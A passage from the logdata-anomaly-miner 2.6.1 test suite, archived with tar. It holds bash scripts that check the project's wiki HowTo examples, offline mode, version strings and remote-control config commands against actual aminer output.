$OUT OUT1=$(tail -n 3 $OUT) OUT2=$(head -n 36 $OUT) OUT1="$OUT2 $OUT1" awk '/^```json/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' > $OUT OUT2=$(tail -n 40 $OUT) echo "$OUT2" > $OUT OUT2=$(tail -n 3 $OUT) OUT3=$(head -n 36 $OUT) OUT2="$OUT3 $OUT2" compareStrings "$OUT1" "$OUT2" "Failed Test in 32." exit_code=$((exit_code | $?)) # 33.) Replace the do_persist method with the code between 9th ```python and 47th ```. sed -i -e "55,57d" $TMP_SEQ_DET awk '/^```python$/ && ++n == 9, /^```$/' < $INPUT | sed '/^```/ d' > $OUT IN1=`cat $OUT` echo -e "\n$IN1" >> $TMP_SEQ_DET sudo cp $TMP_SEQ_DET $SEQ_DET runAminerUntilEnd "$CMD" "" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit_code=$((exit_code | $?)) # 34.) Run the CMD in the first line between 15th ```bash and 48th ``` and compare the output with the second line. awk '/^```bash$/ && ++n == 15, /^```$/' < $INPUT | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD="sudo ${CMD#* }" OUT1=$(sed -n '2p' < $OUT) $CMD > $OUT IN1=`cat $OUT` # not working, because sets have no real order. #compareStrings "$OUT1" "$IN1" "Failed Test in 34." #exit_code=$((exit_code | $?)) # reset schema to backup. sudo cp $TMP_VAL_SCHEMA $VAL_SCHEMA sudo cp $TMP_YML_CONFIG $YML_CONFIG sudo rm $TMP_VAL_SCHEMA sudo rm $CFG_PATH sudo rm $TMP_YML_CONFIG sudo rm $TMP_SEQ_DET sudo rm $SEQ_DET sudo rm $OUT sudo rm $TMP_SCHEMA sudo rm -r logdata-anomaly-miner.wiki sudo rm aminer_install.sh exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runHowToEntropyDetector.sh000077500000000000000000000127721437606560100262150ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Extract the lines between 1st ```yaml and 3rd ``` and store it in CFG_PATH. # 2.) Replace LogResourceList path with LOG1 in CFG_PATH and the report interval of the ParserCount. # 3.) Parse the aminer CMD between 4th and 5th ```, replace the CFG_PATH and run it. # 4.) Compare the first two anomalies with the output between 6th and 7th ``` (without the timestamps) # 5.) Compare the last anomaly with the output between 8th and 9th ``` (without the timestamps) # 6.) Parse the cat CMD in the first line between 10th and 11th ```, run it and compare the result with the second line. # 7.) Extract the lines between 2nd ```yaml and 12th ``` and store it in CFG_PATH. # 8.) Replace LogResourceList path with LOG2 in CFG_PATH. # 9.) Parse the aminer CMD between 13th and 14th ```, replace the CFG_PATH and run it. # 10.) Compare the results of the command with the outputs between 13th and 14th ```. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT_FILE=logdata-anomaly-miner.wiki/HowTo-EntropyDetector.md OUT=/tmp/out.txt LOG1=/tmp/entropy_train.log LOG2=/tmp/entropy_test.log CFG_PATH=/tmp/config.yml TMPFILE1=/tmp/tmpfile1 TMPFILE2=/tmp/tmpfile2 # extract the file from the development branch of the wiki project. # the second ```python script is searched for. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cp files/entropy_train.log $LOG1 cp files/entropy_test.log $LOG2 cd .. # extract config (1.) awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # replace LogResourceList (2.) sed "s?file:///home/ubuntu/entropy/entropy_train.log?file:///${LOG1}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null sed "s?report_interval: 5?report_interval: 555555555?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # parse aminer CMD and run it (3.) awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(cat $OUT) IFS='#' read -ra ADDR <<< "$CMD" CMD="sudo${ADDR[1]}" CMD=$(sed "s?config.yml?$CFG_PATH?g" <<<"$CMD") runAminerUntilEnd "$CMD" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" OUTPUT=$(cat $OUT) # compare results (4.) IN=$(awk '/^```$/ && ++n == 6, /^```$/ && n++ == 7' < $INPUT_FILE | sed '/^```/ d') i=0 while IFS= read -r line do if [[ $i -ne 22 && $i -ne 24 && $i -ne 50 && $i -ne 52 ]]; then echo "$line" >> $TMPFILE1 fi i=$(($i+1)) done <<< "$IN" i=0 while IFS= read -r line do if [[ $i -ge 76 && $i -ne 98 && $i -ne 100 && $i -ne 126 && $i -ne 128 ]]; then echo "$line" >> $TMPFILE2 fi if [[ $i -eq 131 ]]; then break fi i=$(($i+1)) done <<< "$OUTPUT" cmp --silent $TMPFILE1 $TMPFILE2 res=$? if [[ $res != 0 ]]; then echo "Failed Test in 4." fi exit_code=$((exit_code | res)) rm $TMPFILE1 rm $TMPFILE2 # compare last result (5.) IN=$(awk '/^```$/ && ++n == 8, /^```$/ && n++ == 9' < $INPUT_FILE | sed '/^```/ d') i=0 while IFS= read -r line do if [[ $i -ne 22 && $i -ne 24 ]]; then echo "$line" >> $TMPFILE1 fi i=$(($i+1)) done <<< "$IN" i=0 while IFS= read -r line do if [[ $i -ge 2082 && $i -ne 2104 && $i -ne 2106 ]]; then echo "$line" >> $TMPFILE2 fi if [[ $i -eq 2109 ]]; then break fi i=$(($i+1)) done <<< "$OUTPUT" cmp --silent $TMPFILE1 $TMPFILE2 res=$? if [[ $res != 0 ]]; then echo "Failed Test in 5." cat "$TMPFILE1" echo echo cat "$TMPFILE2" exit_code=1 fi exit_code=$((exit_code | res)) rm $TMPFILE1 rm $TMPFILE2 # parse cat CMD, run it and compare to the second line (6.) awk '/^```$/ && ++n == 10, /^```$/ && n++ == 11' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(cat $OUT) IFS='#' read -ra ADDR <<< "$CMD" CMD="${ADDR[1]}" OUTPUT="$(eval sudo $CMD)" IN="$(tail -n 1 $OUT)" compareStrings "$OUTPUT" "$IN" "Failed Test in 6." exit_code=$((exit_code | $?)) # extract second config (7.) awk '/^```yaml$/ && ++n == 2, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # replace LogResourceList (8.) sed "s?file:///home/ubuntu/demo-detectors/entropy/entropy_test.log?file:///${LOG2}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # parse aminer CMD and run it (9.) awk '/^```$/ && ++n == 13, /^```$/ && n++ == 14' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(cat $OUT) IFS='#' read -ra ADDR <<< "$CMD" CMD="sudo${ADDR[1]}" CMD=$(sed "s?config_test.yml?$CFG_PATH?g" <<<"$CMD") runAminerUntilEnd "$CMD" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" OUTPUT=$(head -n 28 $OUT) # skipping ParserCount output from runAminerUntilEndTest. # compare results (10.) awk '/^```$/ && ++n == 13, /^```$/ && n++ == 14' < $INPUT_FILE | sed '/^```/ d' > $OUT IN="$(tail -n +2 $OUT)" i=0 while IFS= read -r line do if [[ $i -ne 22 && $i -ne 24 ]]; then echo "$line" >> $TMPFILE1 fi i=$(($i+1)) done <<< "$IN" i=0 while IFS= read -r line do if [[ $i -ne 22 && $i -ne 24 ]]; then echo "$line" >> $TMPFILE2 fi i=$(($i+1)) done <<< "$OUTPUT" cmp --silent $TMPFILE1 $TMPFILE2 res=$? if [[ $res != 0 ]]; then echo "Failed Test in 10." cat $TMPFILE1 echo cat $TMPFILE2 fi exit_code=$((exit_code | res)) rm $OUT rm $LOG1 rm $LOG2 rm $TMPFILE1 rm $TMPFILE2 sudo rm -r logdata-anomaly-miner.wiki exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runHowToMissingMatchPathValueDetector.sh000077500000000000000000000211541437606560100307470ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # NOTE: not all outputs were compared! If one output fails all other outputs should be corrected as well! # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Write the config to CFG_PATH from 1st ```yaml to 1st ```. # 2.) Replace LogResourceList path with LOG in CFG_PATH. Lower the check_interval and realert_interval to proper values. # 3.) Write log lines from 4th to 5th ``` into LOG and LOG_ALICE and LOG_BOB. # 4.) Extract the first aminer command between 6th and 7th ```, replace the CFG_PATH and run it. # 5.) Compare the result with the output between 6th and 7th ```. # 6.) Extract the CMD between 8th and 9th ```, run it and compare the results to the output. # 7.) Extract the CMD between 10th and 11th ```, run it and compare the results to the output. # 8.) Set LearnMode: False in CFG_PATH # 9.) Extract the second aminer command between 16th and 17th ``` and run it in background. # 10.) Write LOG_ALICE and LOG_BOB to LOG simultaneously, wait for WAIT_TIME. Repeat 5 times. # 11.) Compare the results with the outputs between between 20th and 21st ```. # 12.) Write LOG_BOB to LOG and wait until realert_interval is over and compare the results with the outputs between between 24th and 25th ```. # 13.) Extract the CMD between 35th and 36th ```, run it and compare the results to the output. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT_FILE=logdata-anomaly-miner.wiki/HowTo-MissingMatchPathValueDetector.md OUT=/tmp/out.txt OUT_AMINER=/tmp/aminer_output.txt LOG=/tmp/access.log CFG_PATH=/etc/aminer/config.yml # extract the file from the development branch of the wiki project. # the first ```yaml script is searched for. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. sudo rm -rf /var/lib/aminer/* exit_code=0 # write config (1.) awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # adapt config (2.) sed "s?file:///var/log/apache2/access.log?file:///${LOG}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null echo "Core.PersistencePeriod: 1" | sudo tee -a $CFG_PATH > /dev/null # write log lines (3.) awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT_FILE | sed '/^```/ d' > $OUT LOG_ALICE="$(sed -n '2p' < $OUT)" LOG_BOB="${LOG_ALICE/alice/bob}" echo "$LOG_ALICE" > $LOG # extract and run aminer command (4.) awk '/^```$/ && ++n == 6, /^```$/ && n++ == 7' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(sed -n '1p' < $OUT) CMD=${CMD#*$ } OLD_CFG_PATH=/${CMD#*/} AMINER_CMD="${CMD/"$OLD_CFG_PATH"/"$CFG_PATH"}" runAminerUntilEnd "$AMINER_CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT_AMINER" PID=$! # compare results (5.) IN=$(tail -n +2 $OUT) OUTPUT=$(tail -n +2 $OUT_AMINER) compareStrings "$IN" "$OUTPUT" "Failed Test in 5." exit_code=$((exit_code | $?)) # extract and run CMD and compare output (6.) awk '/^```$/ && ++n == 8, /^```$/ && n++ == 9' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD="$(sed -n '1p' < $OUT)" IFS='$' read -ra ADDR <<< "$CMD" CMD="${ADDR[1]}" OUTPUT=$($CMD) IN="$(sed -n '2p' < $OUT)" compareStrings "$IN" "$OUTPUT" "Failed Test in 6." exit_code=$((exit_code | $?)) # extract and run CMD and compare output (7.) #awk '/^```$/ && ++n == 10, /^```$/ && n++ == 11' < $INPUT_FILE | sed '/^```/ d' > $OUT #CMD="$(sed -n '1p' < $OUT)" #IFS='$' read -ra ADDR <<< "$CMD" #CMD="${ADDR[1]}" #OUTPUT=$($CMD) #IN="$(sed -n '2p' < $OUT)" #compareStrings "$IN" "$OUTPUT" "Failed Test in 7." #exit_code=$((exit_code | $?)) # set LearnMode False (8.) sed "s/LearnMode: True/LearnMode: False/g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # run aminer CMD (9.) rm $LOG # write log lines (10.) cat < $LOG ::1 - - [18/Jul/2020:20:28:01 +0000] "GET / HTTP/1.1" 200 11012 "-" "alice" ::1 - - [18/Jul/2020:20:28:02 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:03 +0000] "GET / HTTP/1.1" 200 11012 "-" "alice" ::1 - - [18/Jul/2020:20:28:04 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:05 +0000] "GET / HTTP/1.1" 200 11012 "-" "alice" ::1 - - [18/Jul/2020:20:28:06 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:07 +0000] "GET / HTTP/1.1" 200 11012 "-" "alice" ::1 - - [18/Jul/2020:20:28:08 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:09 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:10 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:11 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:12 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:13 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" EOT runAminerUntilEnd "$AMINER_CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT_AMINER" "not exit aminer" PID=$! # compare results (11.) awk '/^```$/ && ++n == 20, /^```$/ && n++ == 21' < $INPUT_FILE | sed '/^```/ d' > $OUT IN=$(cat $OUT) OUTPUT=$(cat $OUT_AMINER) compareStrings "$IN" "$OUTPUT" "Failed Test in 11." exit_code=$((exit_code | $?)) # add data and compare results (12.) cat < $LOG ::1 - - [18/Jul/2020:20:28:14 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:15 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:16 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:17 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:18 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:19 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:20 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:21 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:22 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:23 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:24 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:25 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:26 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:27 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:28 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:29 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:30 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:31 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:32 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:33 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:34 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:35 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:36 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:37 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:38 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:39 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:40 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:41 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:42 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:43 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" EOT FILE_SIZE=`stat --printf="%s" $LOGFILE 2> /dev/null` IN=`cat $REP_PATH 2> /dev/null` IFS=',' read -ra ADDR <<< "$IN" CURRENT_SIZE=`echo ${ADDR[1]} | sed 's/ *$//g'` # trim all whitespaces CNTR=0 while [[ ("$CURRENT_SIZE" != "$FILE_SIZE" || "$CURRENT_SIZE" == "") && $CNTR -lt 20 ]]; do sleep 1 IN=`cat $REP_PATH 2> /dev/null` IFS=',' read -ra ADDR <<< "$IN" CURRENT_SIZE=`echo ${ADDR[1]} | sed 's/ *$//g'` # trim all whitespaces CNTR=$((++CNTR)) done sleep 8 sudo pkill -x aminer wait $PID awk '/^```$/ && ++n == 24, /^```$/ && n++ == 25' < $INPUT_FILE | sed '/^```/ d' > $OUT IN=$(cat $OUT) OUTPUT=$(tail -n 4 $OUT_AMINER) compareStrings "$IN" "$OUTPUT" "Failed Test in 12." exit_code=$((exit_code | $?)) # extract command, run it and compare results (13.) awk '/^```$/ && ++n == 35, /^```$/ && n++ == 36' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD="$(sed -n '1p' < $OUT)" IFS='$' read -ra ADDR <<< "$CMD" CMD="${ADDR[1]}" OUTPUT=$($CMD) IN="$(sed -n '2p' < $OUT)" compareStrings "$IN" "$OUTPUT" "Failed Test in 13." exit_code=$((exit_code | $?)) sudo rm -r logdata-anomaly-miner.wiki sudo rm $CFG_PATH rm $OUT rm $LOG exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runJsonDemo.sh000077500000000000000000000016751437606560100236200ustar00rootroot00000000000000OUT=/tmp/out.txt AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/* sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $OUT 2> /dev/null cp -r ./demo/aminerJsonInputDemo/json_logs /tmp/json_logs cp -r ./demo/aminerJsonInputDemo/windows_json_logs /tmp/windows_json_logs sudo ./demo/aminerJsonInputDemo/json-demo.sh $1 $OUT exit_code=$? OUTPUT=$(cat $OUT) if grep -Fq "VerboseUnparsedAtomHandler" $OUT; then exit_code=1 sed '/VerboseUnparsedAtomHandler/,$p' $OUT fi if grep -Fq "UnicodeDecodeError" $OUT || grep -Fq "Config-Error" $OUT || grep -Fq "Traceback" $OUT; then exit_code=1 sed '/UnicodeDecodeError/,$p' $OUT sed '/Config-Error/,$p' $OUT sed '/Traceback/,$p' $OUT fi sudo rm $OUT sudo rm -r /tmp/json_logs sudo rm -r /tmp/windows_json_logs exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runMypy.sh000077500000000000000000000012271437606560100230310ustar00rootroot00000000000000exit_code=0 mypy /usr/lib/logdata-anomaly-miner/aminer/analysis/ --ignore-missing-imports exit_code=$(($exit_code + $?)) mypy /usr/lib/logdata-anomaly-miner/aminer/events/ --ignore-missing-imports exit_code=$(($exit_code + $?)) mypy /usr/lib/logdata-anomaly-miner/aminer/input/ --ignore-missing-imports exit_code=$(($exit_code + $?)) mypy /usr/lib/logdata-anomaly-miner/aminer/parsing/ --ignore-missing-imports exit_code=$(($exit_code + $?)) mypy /usr/lib/logdata-anomaly-miner/aminer/util/ --ignore-missing-imports exit_code=$(($exit_code + $?)) mypy /usr/lib/logdata-anomaly-miner/aminer/ --ignore-missing-imports exit_code=$(($exit_code + $?)) exit $exit_code logdata-anomaly-miner-2.6.1/aecid-testsuite/runOfflineMode.sh000077500000000000000000000046151437606560100242660ustar00rootroot00000000000000#!/bin/bash sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo cp ./integration/offline_mode/data/* /tmp/ exit_code=0 #start aminer #if the aminer is stuck, Jenkins should fail it after a while. sudo aminer --config ./integration/offline_mode/offline_mode.yml --offline-mode --from-begin > /tmp/out.txt OUTPUT=$(cat /tmp/out.txt) read -r -d '' VAR << END New path(es) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model/data: a1 ['/model/data'] a1 END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New path(es) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model/data: b1 ['/model/data'] b1 END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New path(es) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model/data: c1 ['/model/data'] c1 END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New path(es) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model/data: z1 ['/model/data'] z1 END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New path(es) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model/data: a2 ['/model/data'] a2 END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New path(es) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model/data: b2 ['/model/data'] b2 END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New path(es) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model/data: c2 ['/model/data'] c2 END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New path(es) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model/data: z2 ['/model/data'] z2 END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi sudo rm /tmp/file1.log sudo rm /tmp/file2.log exit $exit_codelogdata-anomaly-miner-2.6.1/aecid-testsuite/runReleaseStringCheck.sh000077500000000000000000000022371437606560100256020ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh METADATA_PATH=../source/root/usr/lib/logdata-anomaly-miner/metadata.py CONF_PATH=../docs/conf.py version=$(grep "__version__ =" $METADATA_PATH) version=$(sed 's/__version__ = //g' <<< $version) version=$(sed 's/"//g' <<< $version) release=$(grep "release =" $CONF_PATH) release=$(sed "s/release = //g" <<< $release) release=$(sed "s/'//g" <<< $release) if [[ "$version" == "" || "$release" == "" ]]; then exit 1 fi if [[ "$version" != "$release" ]]; then echo "Version $version not equal with $release." if [[ $# -eq 1 ]]; then if [[ "$1" != "-u" && "$1" != "--update" ]]; then echo "Unknown Parameter $1. Exiting.." exit 1 else compareVersionStrings "$version" "$release" res=$? if [[ $res -eq 1 ]]; then sed -i "s/release = '$release'/release = '$version'/g" $CONF_PATH echo "Updated version string in $CONF_PATH from $release to $version." elif [[ $res -eq 2 ]]; then sed -i "s/__version__ = \"$version\"/__version__ = \"$release\"/g" $METADATA_PATH echo "Updated version string in $METADATA_PATH from $version to $release." fi fi fi exit 1 fi logdata-anomaly-miner-2.6.1/aecid-testsuite/runRemoteControlTest.sh000077500000000000000000000621031437606560100255270ustar00rootroot00000000000000FILE=/tmp/demo-config.py CMD_PATH=/tmp/commands.txt sudo cp demo/aminerRemoteControl/demo-config.py $FILE sudo sed -i 's/StreamPrinterEventHandler(analysis_context)/StreamPrinterEventHandler(analysis_context, stream=open("\/tmp\/log.txt", "a"))/g' $FILE sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo rm /tmp/syslog 2> /dev/null touch /tmp/syslog sudo aminer --config "$FILE" & > /dev/null sleep 1 stdout=$(sudo aminerremotecontrol --exec-file $CMD_PATH) expected="File $CMD_PATH does not exist" if [[ "$stdout" != "$expected" ]]; then echo "$ERROR exec-file not exists." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi START_TIME=$(date +%s) PREFIX="Remote execution response: " NOT_FOUND_WARNINGS="WARNING: config_properties['Core.PersistencePeriod'] = not found in the old config file.\nWARNING: config_properties['Log.StatisticsLevel'] = not found in the old config file.\nWARNING: config_properties['Log.DebugLevel'] = not found in the old config file.\nWARNING: config_properties['Log.StatisticsPeriod'] = not found in the old config file.\n" ERROR="Error at:" exit_code=0 expected_list="" echo "print_config_property(analysis_context, 'Core.PersistenceDir')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "print_config_property(analysis_context, 'Core.PersistenceDir')") expected="$PREFIX'\"Core.PersistenceDir\": /tmp/lib/aminer'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR error printing 'Core.PersistenceDir'." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "print_config_property(analysis_context, 'Core.PersistencePeriod')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "print_config_property(analysis_context, 'Core.PersistencePeriod')") expected="$PREFIX'\"Resource \\\\\"Core.PersistencePeriod\\\\\" could not be found.\"'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR error printing 'Core.PersistencePeriod'." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi # check if proper mail address validation is done. properties=("'MailAlerting.TargetAddress'" "'MailAlerting.FromAddress'") # only test 'MailAlerting.TargetAddress' to reduce runtime and expect 'MailAlerting.FromAddress' to work the same way. properties=("'MailAlerting.TargetAddress'") valid_addresses=("'test123@gmail.com'" "'root@localhost'" ) error_addresses=("'domain.user1@localhost'" "'root@notLocalhost'") for property in "${properties[@]}"; do for address in "${valid_addresses[@]}"; do echo "change_config_property(analysis_context, $property, $address)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $address)") expected="$PREFIX\"$property changed to $address successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to $address." echo "Expected: $expected" echo "$stdout" echo exit_code=1 fi done for address in "${error_addresses[@]}"; do echo "change_config_property(analysis_context, $property, $address)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $address)") expected="$PREFIX'FAILURE: MailAlerting.TargetAddress and MailAlerting.FromAddress must be email addresses!'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to $address." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi done done INTEGER_CONFIG_PROPERTIES=("'MailAlerting.AlertGraceTime'" "'MailAlerting.EventCollectTime'" "'MailAlerting.MinAlertGap'" "'MailAlerting.MaxAlertGap'" "'MailAlerting.MaxEventsPerMessage'" "'Core.PersistencePeriod'" "'Log.StatisticsLevel'" "'Log.DebugLevel'" "'Log.StatisticsPeriod'" "'Resources.MaxMemoryUsage'") STRING_CONFIG_PROPERTIES=("'MailAlerting.TargetAddress'" "'MailAlerting.FromAddress'" "'MailAlerting.SubjectPrefix'" "'LogPrefix'") for property in "${STRING_CONFIG_PROPERTIES[@]}"; do echo "change_config_property(analysis_context, $property, 123)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, 123)") expected="$PREFIX\"FAILURE: the value of the property $property must be of type !\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property wrong Type." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "change_config_property(analysis_context, $property, 'root@localhost')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, 'root@localhost')") expected="$PREFIX\"$property changed to 'root@localhost' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to 'root@localhost'." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi done for property in "${INTEGER_CONFIG_PROPERTIES[@]}"; do echo "change_config_property(analysis_context, $property, '1')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, '1')") 